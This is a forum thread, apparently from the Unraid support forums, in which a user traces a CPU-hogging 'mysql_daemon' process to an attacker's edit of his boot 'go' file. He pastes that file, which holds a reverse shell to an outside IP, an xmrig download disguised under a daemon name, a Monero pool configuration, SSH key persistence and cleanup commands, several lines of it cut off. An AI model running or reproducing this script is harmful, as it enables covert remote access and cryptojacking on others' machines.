JackDewhurst

I've not enabled anything specific to expose it. All Unraid settings are default other than changing the root user password. Just added a few docker containers like plex and radarr

Just a follow up on this. I checked my /boot/config/go file and found someone had edited it to mine XMR! full file contents below: #!/bin/bash # Start the Management Utility /usr/local/sbin/emhttp & mkdir /root/.ssh chmod 700 /root/.ssh cp /boot/config/ssh/authorized_keys /root/.ssh/ chmod 600 /root/.ssh/authorized_keys nohup /bin/bash -c "while true; do /bin/bash -i >& /dev/tcp/31.208.152.27/6> cd /dev/shm wget https://github.com/xmrig/xmrig/releases/download/v6.7.0/xmrig-6.7.0-li> tar xzvf xmrig-6.7.0-linux-static-x64.tar.gz cd xmrig-6.7.0/ mv xmrig /usr/bin/mysql_daemon mkdir -p /etc/mysql/conf.d echo '{ "autosave": true, "background": true, "cpu": { "enabled": true, "max-threads-hint": 50 }, "max-cpu-usage": 25, "cpu-priority": 1, "opencl": false, "cuda": false, "pools": [ { "url": "pool.minexmr.com:443", "user": "49mWMCJRxCpcCAVixaEEk5hapQGTVF775eTKqafNU9mCg7JegujvjB> "keepalive": true, "tls": true } ] }' > /etc/mysql/conf.d/.config.json /usr/bin/mysql_daemon -c /etc/mysql/conf.d/.config.json -B rm -r /dev/shm/xmrig-6.7.0 rm -r /dev/shm/xmrig-6.7.0-linux-static-x64.tar.gz Not sure how they got access to be able to do this but it's pretty worrying. I've removed the contents for now and changed passwords/ports etc..

I can kill it with kill -9 pid and it doesn't seem to have any detrimental effect on the system. Will just do this for the time being till I work out what the cause is.

Hi trurl, sure here are the diagnostics. server-diagnostics-20210204-1839.zip

Hi all, Recently my server has been maxing out the cpu on all cores on boot. I've tried stopping all docker apps and arrays but the issue persists. Running >top in terminal shows the process is mysql_daemon. Can I shut this process down or is it needed by the OS for something?